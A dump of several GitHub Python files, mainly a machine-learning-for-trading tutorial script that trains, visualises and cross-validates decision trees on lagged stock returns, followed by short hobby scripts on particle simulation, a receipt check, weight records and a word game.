export_graphviz(\n reg_tree_t2,\n out_file=out_file.as_posix(),\n feature_names=X2.columns,\n max_depth=2,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Compare with Linear Regression\n # The OLS summary below and a visualization of the first two levels of the decision tree above reveal the striking\n # differences between the models. The OLS model provides three parameters for the intercepts and the two features\n # in line with the linear assumption. In contrast, the regression tree chart above displays for each node of the\n # first two levels the feature and threshold used to split the data (note that features can be used repeatedly),\n # as well as the current value of the mean-squared error (MSE), the number of samples, and predicted value based\n # on these training samples. 
The tree chart also highlights the uneven distribution of samples across the nodes as\n # the numbers vary between 31,000 and 65,000 samples after only two splits.\n\n #### statsmodels OLS\n ols_model = sm.OLS(endog=y2, exog=sm.add_constant(X2))\n result = ols_model.fit()\n print(result.summary())\n\n #### sklearn Linear Regression\n lin_reg = LinearRegression()\n lin_reg.fit(X=X2, y=y2)\n print(lin_reg.intercept_)\n print(lin_reg.coef_)\n\n ### Linear Regression vs Regression Tree Decision Surfaces\n # To further illustrate the different assumptions about the functional form of the relationships between the input\n # variables and the output, we can visualize current return predictions as a function of the feature space, that is,\n # as a function of the range of values for the lagged returns. The following figure shows the current period return\n # as a function of returns one and two periods ago for linear regression and the regression tree:\n # The linear-regression model result on the right side underlines the linearity of the relationship between lagged\n # and current returns, whereas the regression tree chart on the left illustrates the non-linear relationship\n # encoded in the recursive partitioning of the feature space.\n t1, t2 = np.meshgrid(\n np.linspace(X2[\"t-1\"].quantile(0.01), X2[\"t-1\"].quantile(0.99), 100),\n np.linspace(X2[\"t-2\"].quantile(0.01), X2[\"t-2\"].quantile(0.99), 100),\n )\n X_data = np.c_[t1.ravel(), t2.ravel()]\n\n fig, axes = plt.subplots(ncols=2, figsize=(12, 5))\n\n # Linear Regression\n ret1 = lin_reg.predict(X_data).reshape(t1.shape)\n surface1 = axes[0].contourf(t1, t2, ret1, cmap=\"Blues\")\n plt.colorbar(mappable=surface1, ax=axes[0])\n\n # Regression Tree\n ret2 = reg_tree_t2.predict(X_data).reshape(t1.shape)\n surface2 = axes[1].contourf(t1, t2, ret2, cmap=\"Blues\")\n plt.colorbar(mappable=surface2, ax=axes[1])\n\n # Format plots\n titles = [\"Linear Regression\", \"Regression Tree\"]\n for i, ax in enumerate(axes):\n ax.set_xlabel(\"t-1\")\n ax.set_ylabel(\"t-2\")\n ax.set_title(titles[i])\n\n fig.suptitle(\"Decision Surfaces\", fontsize=14)\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-02.png\")\n\n ## Simple Classification Tree with Time Series Data\n # A classification tree works just like the regression version, except that categorical nature of the outcome\n # requires a different approach to making predictions and measuring the loss. While a regression tree predicts\n # the response for an observation assigned to a leaf node using the mean outcome of the associated training samples,\n # a classification tree instead uses the mode, that is, the most common class among the training samples in the\n # relevant region. A classification tree can also generate probabilistic predictions based on relative class frequencies.\n\n ### Loss Functions\n # When growing a classification tree, we also use recursive binary splitting but, instead of evaluating the quality\n # of a decision rule using the reduction of the mean-squared error, we can use the classification error rate, which\n # is simply the fraction of the training samples in a given (leave) node that do not belong to the most common class.\n # However, the alternative measures, Gini Index or Cross-Entropy, are preferred because they are more sensitive to\n # node purity than the classification error rate. Node purity refers to the extent of the preponderance of a single\n # class in a node. 
A node that only contains samples with outcomes belonging to a single class is pure and imply\n # successful classification for this particular region of the feature space.\n\n def entropy(f):\n return (-f * np.log2(f) - (1 - f) * np.log2(1 - f)) / 2\n\n def gini(f):\n return 2 * f * (1 - f)\n\n def misclassification_rate(f):\n return np.where(f <= 0.5, f, 1 - f)\n\n # Both the Gini Impurity and the Cross-Entropy measure take on smaller values when the class proportions approach\n # zero or one, that is, when the child nodes become pure as a result of the split and are highest when the class\n # proportions are even or 0.5 in the binary case. The chart below visualizes the values assumed by these two\n # measures and the misclassification error rates across the [0, 1] interval of proportions.\n\n x = np.linspace(0, 1, 10000)\n (\n pd.DataFrame(\n {\n \"Gini\": gini(x),\n \"Entropy\": entropy(x),\n \"Misclassification Rate\": misclassification_rate(x),\n },\n index=x,\n ).plot(title=\"Classification Loss Functions\", lw=2, style=[\"-\", \"--\", \":\"])\n )\n plt.tight_layout()\n plt.savefig(\"images/01-03.png\")\n\n #### Compare computation time\n # Gini is often preferred over entropy because it computes faster:\n print(misclassification_rate(x))\n print(gini(x))\n print(entropy(x))\n\n ### Configure Tree\n clf_tree_t2 = DecisionTreeClassifier(\n criterion=\"gini\",\n splitter=\"best\",\n max_depth=5,\n min_samples_split=1000,\n min_samples_leaf=1,\n min_weight_fraction_leaf=0.0,\n max_features=None,\n random_state=42,\n max_leaf_nodes=None,\n min_impurity_decrease=0.0,\n class_weight=None,\n )\n\n ### Train Tree\n y_binary = (y2 > 0).astype(int)\n print(y_binary.value_counts())\n\n clf_tree_t2.fit(X=X2, y=y_binary)\n\n ### Visualize Tree\n out_file = results_path / \"clf_tree_t2.dot\"\n dot_data = export_graphviz(\n clf_tree_t2,\n out_file=out_file.as_posix(),\n feature_names=X2.columns,\n class_names=[\"Down\", \"Up\"],\n max_depth=2,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Compare with Logistic Regression\n #### Statsmodels\n log_reg_sm = sm.Logit(endog=y_binary, exog=sm.add_constant(X2))\n log_result = log_reg_sm.fit()\n print(log_result.summary())\n\n #### sklearn\n log_reg_sk = LogisticRegression()\n log_reg_sk.fit(X=X2, y=y_binary)\n print(log_reg_sk.coef_)\n\n ### Decision Surfaces: Classifier Tree vs. Logistic Regression\n fig, axes = plt.subplots(ncols=2, figsize=(12, 5))\n\n # Linear Regression\n ret1 = log_reg_sk.predict_proba(X_data)[:, 1].reshape(t1.shape)\n surface1 = axes[0].contourf(t1, t2, ret1, cmap=\"Blues\")\n plt.colorbar(mappable=surface1, ax=axes[0])\n\n # Regression Tree\n ret2 = clf_tree_t2.predict_proba(X_data)[:, 1].reshape(t1.shape)\n surface2 = axes[1].contourf(t1, t2, ret2, cmap=\"Blues\")\n plt.colorbar(mappable=surface2, ax=axes[1])\n\n # Format plots\n titles = [\"Logistic Regression\", \"Classification Tree\"]\n for i, ax in enumerate(axes):\n ax.set_xlabel(\"t-1\")\n ax.set_ylabel(\"t-2\")\n ax.set_title(titles[i])\n\n fig.suptitle(\"Decision Surfaces\", fontsize=20)\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-04.png\")\n\n ## Regression Tree with all Features\n # We now train, visualize, and evaluate a regression tree with up to 5 consecutive splits using 80% of the samples\n # for training to predict the remaining 20%. 
We are taking a shortcut here to simplify the illustration and use\n # the built-in train_test_split, which does not protect against lookahead bias, as our custom iterator. The tree\n # configuration implies up to $2^5=32$ leaf nodes that, on average in the balanced case, would contain over 4,300\n # of the training samples.\n\n ### Train-Test Split\n X = pd.get_dummies(data.drop(\"target\", axis=1))\n y = data.target\n\n X_train, X_test, y_train, y_test = train_test_split(X, y, test_size=0.2, random_state=42)\n\n ### Configure Tree\n # The output after training the model displays all the DecisionTreeClassifier parameters that we will address in\n # more detail in the next section when we discuss parameter-tuning.\n regression_tree = DecisionTreeRegressor(\n criterion=\"mse\",\n splitter=\"best\",\n max_depth=5,\n min_samples_split=2,\n min_samples_leaf=1,\n min_weight_fraction_leaf=0.0,\n max_features=None,\n random_state=42,\n max_leaf_nodes=None,\n min_impurity_decrease=0.0,\n )\n\n ### Train Model\n regression_tree.fit(X=X_train, y=y_train)\n\n ### Visualize Tree\n # The result shows that the model uses a variety of different features and indicates the split rules for both\n # continuous and categorical (dummy) variables.\n out_file = results_path / \"reg_tree.dot\"\n dot_data = export_graphviz(\n regression_tree,\n out_file=out_file.as_posix(),\n feature_names=X_train.columns,\n max_depth=3,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Evaluate Test Set\n y_pred = regression_tree.predict(X_test)\n print(np.sqrt(mean_squared_error(y_pred=y_pred, y_true=y_test)))\n\n r, p = spearmanr(y_pred, y_test)\n print(f\"{r*100:.2f} (p-value={p:.2%})\")\n\n ## Classification Tree with all Features\n # We will now train, visualize, and evaluate a classification tree with up to 5 consecutive splits using 80% of the\n # samples for training to predict the remaining 20%. We are taking a shortcut here to simplify the illustration and\n # use the built-in train_test_split, which does not protect against lookahead bias, as our custom iterator. The tree\n # configuration implies up to $2^5=32$ leaf nodes that, on average in the balanced case, would contain over 4,300 of\n # the training samples.\n\n ### Train-Test Split\n y_binary = (y > 0).astype(int)\n print(y_binary.value_counts())\n\n X_train, X_test, y_train, y_test = train_test_split(X, y_binary, test_size=0.2, random_state=42)\n\n clf = DecisionTreeClassifier(criterion=\"gini\", max_depth=5, random_state=42)\n clf.fit(X=X_train, y=y_train)\n\n ### Plot Tree\n out_file = results_path / \"clf_tree.dot\"\n dot_data = export_graphviz(\n clf,\n out_file=out_file.as_posix(),\n feature_names=X.columns,\n class_names=[\"Down\", \"Up\"],\n max_depth=3,\n filled=True,\n rounded=True,\n special_characters=True,\n )\n if out_file is not None:\n dot_data = Path(out_file).read_text()\n\n graphviz.Source(dot_data)\n\n ### Evaluate Test Set\n # To evaluate the predictive accuracy of our first classification tree, we will use our test set to generate\n # predicted class probabilities. The `.predict_proba()` method produces one probability for each class. 
In the binary\n # class, these probabilities are complementary and sum to 1, so we only need the value for the positive class.\n y_score = clf.predict_proba(X=X_test)[:, 1]\n\n # To evaluate the generalization error, we will use the area under the curve based on the receiver-operating\n # characteristic that we introduced in Chapter 6, The Machine Learning Process. The result indicates a significant\n # improvement above and beyond the baseline value of 0.5 for a random prediction:\n print(roc_auc_score(y_score=y_score, y_true=y_test))\n\n ### Print Decision Path\n # Inspired by\n # https://stackoverflow.com/questions/20224526/how-to-extract-the-decision-rules-from-scikit-learn-decision-tree\n\n help(Tree)\n\n def tree_to_code(tree, feature_names):\n if isinstance(tree, DecisionTreeClassifier):\n model = \"clf\"\n elif isinstance(tree, DecisionTreeRegressor):\n model = \"reg\"\n else:\n raise ValueError(\"Need Regression or Classification Tree\")\n\n tree_ = tree.tree_\n feature_name = [\n feature_names[i] if i != _tree.TREE_UNDEFINED else \"undefined!\" for i in tree_.feature\n ]\n print(\"def tree({}):\".format(\", \".join(feature_names)))\n\n def recurse(node, depth):\n indent = \" \" * depth\n if tree_.feature[node] != _tree.TREE_UNDEFINED:\n name = feature_name[node]\n threshold = tree_.threshold[node]\n print(indent, f\"if {name} <= {threshold:.2%}\")\n recurse(tree_.children_left[node], depth + 1)\n print(indent, f\"else: # if {name} > {threshold:.2%}\")\n recurse(tree_.children_right[node], depth + 1)\n else:\n pred = tree_.value[node][0]\n val = pred[1] / sum(pred) if model == \"clf\" else pred[0]\n print(indent, f\"return {val:.2%}\")\n\n recurse(0, 1)\n\n tree_to_code(clf_tree_t2, X2.columns)\n\n ## Overfitting, Regularization & Parameter Tuning\n # Decision trees have a strong tendency to overfit, especially when a dataset has a large number of features\n # relative to the number of samples. As discussed in previous chapters, overfitting increases the prediction error\n # because the model does not only learn the signal contained in the training data, but also the noise.\n # There are several ways to address the risk of overfitting.\n # Decision trees provide several regularization hyperparameters to limit the growth of a tree and the associated\n # complexity. While every split increases the number of nodes, it also reduces the number of samples available per\n # node to support a prediction. For each additional level, twice the number of samples is needed to populate the\n # new nodes with the same sample density.\n\n ### Decision Tree Parameters\n # The following table lists key parameters available for this purpose in the sklearn decision tree implementation.\n # After introducing the most important parameters, we will illustrate how to use cross-validation to optimize the\n # hyperparameter settings with respect to the bias-variance tradeoff and lower prediction errors:\n\n # | Parameter | Default | Options | Description |\n # |--------------------------|---------|-----------------------------------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------|\n # | criterion | gini | Regression: MSE, MAE Classification: Gini impurity, Cross Entropy | Metric to evaluate split quality. 
|\n # | splitter | best | best, random | How to choose the split at each node. Supported strategies are “best” to choose the best split and “random” to choose the best random split. |\n # | max_depth | None | int | Max # of levels in tree. Split nodes until max_depth is reached or all leaves are pure or all leaves contain less than min_samples_split samples. |\n # | max_features | None | None: max_features=n_features; int; float (fraction): int(max_features * n_features) auto, sqrt: max_features=sqrt(n_features). log2: max_features=log2(n_features). | # of features to consider when evaluating split |\n # | max_leaf_nodes | None | None: unlimited # of leaf nodes int | Continue to split nodes that reduce relative impurity the most until reaching max_leaf_nodes. |\n # | min_impurity_decrease | 0 | float | Split node if impurity decreases by at least this value. |\n # | min_samples_leaf | 1 | int; float (as percentage of N) | Minimum # of samples to be at a leaf node. A split will only be considered if there are at least min_samples_leaf training samples in each of the left and right branches. May smoothen the model, esp. for regression. |\n # | min_samples_split | 2 | int; float (as percentage of N) | The minimum number of samples required to split an internal node: |\n # | min_weight_fraction_leaf | 0 | NA | The minimum weighted fraction of the sum total of weights (of all the input samples) required to be at a leaf node. Samples have equal weight when sample_weight is not provided (in fit method). |\n # | class_weight | None | balanced: inversely proportional to class frequencies dict: {class_label: weight} list of dicts (for multi-output) | Weights associated with classes |\n\n # The `max_depth` parameter imposes a hard limit on the number of consecutive splits and represents the most\n # straightforward way to cap the growth of a tree. The m`in_samples_split` and `min_samples_leaf` parameters are\n # alternative, data-driven ways to limit the growth of a tree. Rather than imposing a hard limit on the number of\n # consecutive splits, these parameters control the minimum number of samples required to further split the data.\n # The latter guarantees a certain number of samples per leaf, while the former can create very small leaves if a\n # split results in a very uneven distribution. Small parameter values facilitate overfitting, while a high number\n # may prevent the tree from learning the signal in the data.\n # The default values are often quite low, and you should use cross-validation to explore a range of potential values.\n # You can also use a float to indicate a percentage as opposed to an absolute number.\n\n ### Cross-validation parameters\n n_splits = 10\n train_period_length = 60\n test_period_length = 6\n lookahead = 1\n\n cv = MultipleTimeSeriesCV(\n n_splits=n_splits,\n train_period_length=train_period_length,\n test_period_length=test_period_length,\n lookahead=lookahead,\n )\n\n max_depths = range(1, 16)\n\n ### Finding the best trees using GridSearchCV\n # scikit-learn provides a method to define ranges of values for multiple hyperparameters. 
It automates the process\n # of cross-validating the various combinations of these parameter values to identify the optimal configuration.\n # Let's walk through the process of automatically tuning your model.\n\n #### Define parameter grid\n # The first step is to define a dictionary where the keywords name the hyperparameters, and the values list the\n # parameter settings to be tested:\n\n param_grid = {\n \"max_depth\": [2, 3, 4, 5, 6, 7, 8, 10, 12, 15],\n \"min_samples_leaf\": [5, 25, 50, 100],\n \"max_features\": [\"sqrt\", \"auto\"],\n }\n\n #### Classification Tree\n # Then, we instantiate a model object:\n clf = DecisionTreeClassifier(random_state=42)\n\n # Now we instantiate the GridSearchCV object, providing the estimator object and parameter grid, as well as a\n # scoring method and cross-validation choice to the initialization method. We'll use an object of our custom\n # OneStepTimeSeriesSplit class, initialized to use ten folds for the cv parameter, and set the scoring to the\n # roc_auc metric. We can parallelize the search using the n_jobs parameter and automatically obtain a trained model\n # that uses the optimal hyperparameters by setting `refit=True`.\n gridsearch_clf = GridSearchCV(\n estimator=clf,\n param_grid=param_grid,\n scoring=\"roc_auc\",\n n_jobs=-1,\n cv=cv,\n refit=True,\n return_train_score=True,\n )\n\n # With all settings in place, we can fit GridSearchCV just like any other model:\n gridsearch_clf.fit(X=X, y=y_binary)\n\n # The training process produces some new attributes for our GridSearchCV object, most importantly the information\n # about the optimal settings and the best cross-validation score (now using the proper setup that avoids lookahead\n # bias). Setting `max_depth` to 10, `min_samples_leaf` to 750, and randomly selecting only a number corresponding\n # to the square root of the total number of features when deciding on a split, produces the best results, with an\n # AUC of 0.532:\n print(gridsearch_clf.best_params_)\n print(gridsearch_clf.best_score_)\n\n #### Define Custom IC score\n def rank_correl(y, y_pred):\n return spearmanr(y, y_pred)[0]\n\n ic = make_scorer(rank_correl)\n\n #### Regression Tree\n reg_tree = DecisionTreeRegressor(random_state=42)\n\n gridsearch_reg = GridSearchCV(\n estimator=reg_tree,\n param_grid=param_grid,\n scoring=ic,\n n_jobs=-1,\n cv=cv,\n refit=True,\n return_train_score=True,\n )\n gridsearch_reg.fit(X=X, y=y)\n print(gridsearch_reg.best_params_)\n print(gridsearch_reg.best_score_)\n\n print(\n pd.DataFrame(\n {\n \"Regression\": pd.Series(gridsearch_reg.best_params_),\n \"Classification\": pd.Series(gridsearch_clf.best_params_),\n }\n )\n )\n\n ### Classifier Cross-Validation is the most important tool to obtain an unbiased estimate of the generalization error,\n # which in turn permits an informed choice among the various configuration options. sklearn offers several tools to\n # facilitate the process of cross-validating numerous parameter settings, namely the GridSearchCV convenience class\n # that we will illustrate in the next section. The following code illustrates how to run cross-validation more\n # manually to obtain custom tree attributes, such as the total number of nodes or leaf nodes associated with certain\n # hyperparameter settings. 
The following function accesses the internal `.tree_` attribute to retrieve information\n # about the total node count, and how many of these nodes are leaf nodes:\n def get_leaves_count(tree):\n t = tree.tree_\n n = t.node_count\n leaves = len([i for i in range(t.node_count) if t.children_left[i] == -1])\n return leaves\n\n # We can combine this information with the train and test scores to gain detailed knowledge about the model behavior\n # throughout the cross-validation process, as follows:\n train_scores, val_scores, leaves = {}, {}, {}\n for max_depth in max_depths:\n print(max_depth, end=\" \", flush=True)\n clf = DecisionTreeClassifier(\n criterion=\"gini\",\n max_depth=max_depth,\n min_samples_leaf=5,\n max_features=\"sqrt\",\n random_state=42,\n )\n train_scores[max_depth], val_scores[max_depth], leaves[max_depth] = [], [], []\n for train_idx, test_idx in cv.split(X):\n X_train, y_train, = (\n X.iloc[train_idx],\n y_binary.iloc[train_idx],\n )\n X_test, y_test = X.iloc[test_idx], y_binary.iloc[test_idx]\n clf.fit(X=X_train, y=y_train)\n\n train_pred = clf.predict_proba(X=X_train)[:, 1]\n train_score = roc_auc_score(y_score=train_pred, y_true=y_train)\n train_scores[max_depth].append(train_score)\n\n test_pred = clf.predict_proba(X=X_test)[:, 1]\n val_score = roc_auc_score(y_score=test_pred, y_true=y_test)\n val_scores[max_depth].append(val_score)\n leaves[max_depth].append(get_leaves_count(clf))\n\n clf_train_scores = pd.DataFrame(train_scores)\n clf_valid_scores = pd.DataFrame(val_scores)\n clf_leaves = pd.DataFrame(leaves)\n\n clf_cv_data = pd.concat(\n [\n pd.melt(clf_train_scores, var_name=\"Max. Depth\", value_name=\"ROC AUC\").assign(\n Data=\"Train\"\n ),\n pd.melt(clf_valid_scores, var_name=\"Max. Depth\", value_name=\"ROC AUC\").assign(\n Data=\"Valid\"\n ),\n ]\n )\n\n ### Regression tree cross-validation\n #### Run cross-validation\n train_scores, val_scores, leaves = {}, {}, {}\n for max_depth in max_depths:\n print(max_depth, end=\" \", flush=True)\n reg_tree = DecisionTreeRegressor(\n max_depth=max_depth, min_samples_leaf=50, max_features=\"sqrt\", random_state=42\n )\n train_scores[max_depth], val_scores[max_depth], leaves[max_depth] = [], [], []\n for train_idx, test_idx in cv.split(X):\n X_train, y_train, = (\n X.iloc[train_idx],\n y.iloc[train_idx],\n )\n X_test, y_test = X.iloc[test_idx], y.iloc[test_idx]\n reg_tree.fit(X=X_train, y=y_train)\n\n train_pred = reg_tree.predict(X=X_train)\n train_score = spearmanr(train_pred, y_train)[0]\n train_scores[max_depth].append(train_score)\n\n test_pred = reg_tree.predict(X=X_test)\n val_score = spearmanr(test_pred, y_test)[0]\n val_scores[max_depth].append(val_score)\n leaves[max_depth].append(get_leaves_count(reg_tree))\n\n reg_train_scores = pd.DataFrame(train_scores)\n reg_valid_scores = pd.DataFrame(val_scores)\n reg_leaves = pd.DataFrame(leaves)\n\n reg_cv_data = (\n pd.melt(reg_train_scores, var_name=\"Max. Depth\", value_name=\"IC\")\n .assign(Data=\"Train\")\n .append(\n pd.melt(reg_valid_scores, var_name=\"Max. Depth\", value_name=\"IC\").assign(Data=\"Valid\")\n )\n .reset_index()\n )\n\n ### Compare CV Results\n fig, axes = plt.subplots(ncols=2, figsize=(14, 5))\n # sns.lineplot(data=reg_cv_data, x=\"Max. Depth\", y=\"IC\", hue=\"Data\", ci=95, ax=axes[0], lw=2)\n\n axes[0].set_title(\"Regression Tree\")\n axes[0].axvline(x=reg_valid_scores.mean().idxmax(), ls=\"--\", c=\"k\", lw=1)\n axes[0].axhline(y=0, ls=\"--\", c=\"k\", lw=1)\n\n # sns.lineplot(data=clf_cv_data, x=\"Max. 
Depth\", y=\"ROC AUC\", hue=\"Data\", ci=95, ax=axes[1], lw=2)\n\n axes[1].set_title(\"Classification Tree\")\n axes[1].axvline(x=clf_valid_scores.mean().idxmax(), ls=\"--\", c=\"k\", lw=1)\n axes[1].axhline(y=0.5, ls=\"--\", c=\"k\", lw=1)\n for ax in axes:\n ax.set_xlim(min(param_grid[\"max_depth\"]), max(param_grid[\"max_depth\"]))\n\n fig.suptitle(f\"Train-Validation Scores\", fontsize=14)\n fig.tight_layout()\n fig.subplots_adjust(top=0.91)\n plt.savefig(\"images/01-04.png\")\n\n ### Learning Curves for best models\n # A learning curve is a useful tool that displays how the validation and training score evolve as the number of\n # training samples evolves. The purpose of the learning curve is to find out whether and how much the model would\n # benefit from using more data during training. It is also useful to diagnose whether the model's generalization\n # error is more likely driven by bias or variance. If, for example, both the validation score and the training score\n # converge to a similarly low value despite an increasing training set size, the error is more likely due to bias,\n # and additional training data is unlikely to help.\n\n #### Classifier\n sizes = np.arange(0.1, 1.01, 0.1)\n\n train_sizes, train_scores, valid_scores = learning_curve(\n gridsearch_clf.best_estimator_,\n X,\n y_binary,\n train_sizes=sizes,\n cv=cv,\n scoring=\"roc_auc\",\n n_jobs=-1,\n shuffle=True,\n random_state=42,\n )\n\n clf_lc_data = pd.concat(\n [\n pd.melt(\n pd.DataFrame(train_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"ROC AUC\",\n ).assign(Data=\"Train\"),\n pd.melt(\n pd.DataFrame(valid_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"ROC AUC\",\n ).assign(Data=\"Valid\"),\n ]\n )\n clf_lc_data.info()\n\n #### Regression Tree\n train_sizes, train_scores, valid_scores = learning_curve(\n gridsearch_reg.best_estimator_,\n X,\n y,\n train_sizes=sizes,\n cv=cv,\n scoring=ic,\n n_jobs=-1,\n shuffle=True,\n random_state=42,\n )\n\n reg_lc_data = pd.concat(\n [\n pd.melt(\n pd.DataFrame(train_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"IC\",\n ).assign(Data=\"Train\"),\n pd.melt(\n pd.DataFrame(valid_scores.T, columns=train_sizes),\n var_name=\"Train Size\",\n value_name=\"IC\",\n ).assign(Data=\"Valid\"),\n ]\n )\n reg_lc_data.info()\n\n #### Compare Learning Curves\n fig, axes = plt.subplots(ncols=2, figsize=(14, 5))\n xmin, xmax = reg_lc_data[\"Train Size\"].min(), reg_lc_data[\"Train Size\"].max()\n\n # sns.lineplot(data=reg_lc_data, x=\"Train Size\", y=\"IC\", hue=\"Data\", ci=95, ax=axes[0], lw=2)\n\n axes[0].set_title(\"Best Regression Tree\")\n axes[0].set_ylabel(\"IC\")\n\n axes[0].xaxis.set_major_formatter(FuncFormatter(lambda x, _: \"{:,.0f}\".format(x)))\n\n sns.lineplot(data=clf_lc_data, x=\"Train Size\", y=\"ROC AUC\", hue=\"Data\", ci=95, ax=axes[1], lw=2)\n axes[1].set_title(\"Best Classification Tree\")\n axes[1].set_ylabel(\"ROC AUC\")\n axes[1].xaxis.set_major_formatter(FuncFormatter(lambda x, _: \"{:,.0f}\".format(x)))\n\n for i in [0, 1]:\n axes[i].tick_params(axis=\"both\", which=\"major\", labelsize=10)\n axes[i].tick_params(axis=\"both\", which=\"minor\", labelsize=8)\n axes[i].set_xlim(xmin, xmax)\n\n fig.suptitle(\"Learning Curves\", fontsize=14)\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-06.png\")\n\n ### Feature Importance\n # Decision trees can not only be visualized to inspect the decision path for a given feature, but also provide a\n # summary 
measure of the contribution of each feature to the model fit to the training data. The feature importance\n # captures how much the splits produced by the feature helped to optimize the model's metric used to evaluate the\n # split quality, which in our case is the Gini Impurity index.\n # A feature's importance is computed as the (normalized) total reduction of this metric and takes into account the\n # number of samples affected by a split. Hence, features used earlier in the tree where the nodes tend to contain\n # more samples typically are considered of higher importance.\n\n top_n = 15\n labels = X.columns.str.replace(\"_\", \" \").str.upper()\n fi_clf = (\n pd.Series(gridsearch_clf.best_estimator_.feature_importances_, index=labels)\n .sort_values(ascending=False)\n .iloc[:top_n]\n )\n fi_reg = (\n pd.Series(gridsearch_reg.best_estimator_.feature_importances_, index=labels)\n .sort_values(ascending=False)\n .iloc[:top_n]\n )\n\n fig, axes = plt.subplots(ncols=2, figsize=(12, 4), sharex=True)\n color = cm.Blues(np.linspace(0.4, 0.9, top_n))\n fi_clf.sort_values().plot.barh(ax=axes[1], title=\"Classification Tree\", color=color)\n fi_reg.sort_values().plot.barh(ax=axes[0], title=\"Regression Tree\", color=color)\n axes[0].set_xlabel(\"Feature Importance\")\n axes[1].set_xlabel(\"Feature Importance\")\n fig.suptitle(f\"Top {top_n} Features\", fontsize=14)\n sns.despine()\n fig.tight_layout()\n fig.subplots_adjust(top=0.9)\n plt.savefig(\"images/01-07.png\")\n","repo_name":"mecha2k/ml-algorithm-trading-2nd","sub_path":"src/11 decision_trees_random_forests/01_decision_trees.py","file_name":"01_decision_trees.py","file_ext":"py","file_size_in_byte":40880,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"16"} +{"seq_id":"43337129429","text":"import sys\r\n\r\ntotal = int(input())\r\ntypes = int(input())\r\ncheck = 0\r\n\r\nfor i in range(types):\r\n a, b = map(int, sys.stdin.readline().split())\r\n check += (a*b)\r\n\r\nif check == total:\r\n print('Yes')\r\nelse:\r\n print('No')\r\n ","repo_name":"HistoryDan/problem-solving","sub_path":"백준/Bronze/25304. 영수증/영수증.py","file_name":"영수증.py","file_ext":"py","file_size_in_byte":232,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"16"} +{"seq_id":"19722178953","text":"import h5py\nimport numpy as np\nimport ParticleSys as ps\nimport matplotlib.pyplot as plt\nplt.style.use('elegant.mplstyle')\nl1=np.array([ps.Particle(30+np.linspace(0,400,1000)[i],\n 10+np.linspace(0,400,1000)[i],\n 100,100,0.2,1) for i in range(1000)])\nl2=np.array([ps.Particle(5+np.linspace(0,400,1000)[i],\n 20+np.linspace(0,400,1000)[i],\n 100,100,0.2,1) for i in range(1000)])#初始化点\nal=np.hstack([l1,l2])\nwall=ps.Wall()\nf=h5py.File(\"HDF5Data.h5\",\"w\")\ng=f.create_group(\"input_data\")\npcs=ps.ParticleSystem(True,wall,al,g)\nax=plt.subplot(111)\npcs.show(ax)\npcs.in_write_hdf5(0.05,30,0.2)\nplt.show()#*展示点分布\nf.flush()\nf.close()\n\n\n\n","repo_name":"lsyxiaopang/Particle-Simulation","sub_path":"IO/HDFin.py","file_name":"HDFin.py","file_ext":"py","file_size_in_byte":732,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"44263242538","text":"# Lista composta e análise de dados\ndado = []\nregistros = []\nmenorPeso = maiorPeso = 0\ncontinuar = 'S'\nwhile continuar != 'N':\n dado.append(str(input('Nome: ')))\n dado.append(float(input('Peso: ')))\n continuar = str(input('Quer continuar? 
[S/N] ')).strip().upper()\n if len(registros) == 0:\n menorPeso = maiorPeso = dado[1]\n if menorPeso >= dado[1]:\n menorPeso = dado[1]\n if maiorPeso <= dado[1]:\n maiorPeso = dado[1]\n registros.append(dado[:])\n dado.clear()\nprint('-'*33)\nprint(f'Ao todo, você cadastrou {len(registros)} pessoas.')\nprint(f'O maior peso foi de {maiorPeso}kg, de ', end='')\nfor p in registros:\n if p[1] == maiorPeso:\n print(f'{p[0]} ', end='')\nprint(f'\\nO menor peso foi de {menorPeso}kg, de ', end='')\nfor p in registros:\n if p[1] == menorPeso:\n print(f'{p[0]} ', end='')\n","repo_name":"opaulolopes/myFreshStart","sub_path":"Python/Python - Mundo 3/ex084.py","file_name":"ex084.py","file_ext":"py","file_size_in_byte":855,"program_lang":"python","lang":"pt","doc_type":"code","stars":0,"dataset":"github-code","pt":"16"} +{"seq_id":"19454136492","text":"import time\n\nfrom players.player_moves_heuristic import PlayerMoveHeu\nfrom players.player_utc import PlayerUCT\nfrom utility import *\nfrom utility2 import *\n\ncomputer_player_list = [[\"Komputer losowy\", PlayerRng], [\"Komputer UCT\", PlayerUCT],\n [\"Komputer heurystyka ilości ruchów\", PlayerMoveHeu]\n ]\n\npl_dict_gamemode = {\"1\": [\"Człowiek\", HumanPlayer]}\npl_dict_testmode = {}\n\ni = 1\nfor pl in computer_player_list:\n pl_dict_gamemode[str(i+1)] = pl\n pl_dict_testmode[str(i)] = pl\n i = i + 1\n\ndel_dict = {\"1\": [\"Nie\", False],\n \"2\": [\"Tak\", True]}\n\nbase_alphabet = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z',\n 'A', 'B', 'C', 'D', 'E', 'F', 'G', 'H', 'I', 'J', 'K', 'L', 'M', 'N', 'O', 'P', 'Q', 'R', 'S', 'T', 'U', 'V', 'W', 'X', 'Y', 'Z']\n\n# base_alphabet = ['a', 'b', 'c']\n\n\nclass AtoGame:\n def __init__(self):\n # game parameters\n self.alph_count = -1\n self.word_length = -1\n self.p1 = None\n self.p2 = None\n self.alphabet = []\n\n # game variables\n self.log = 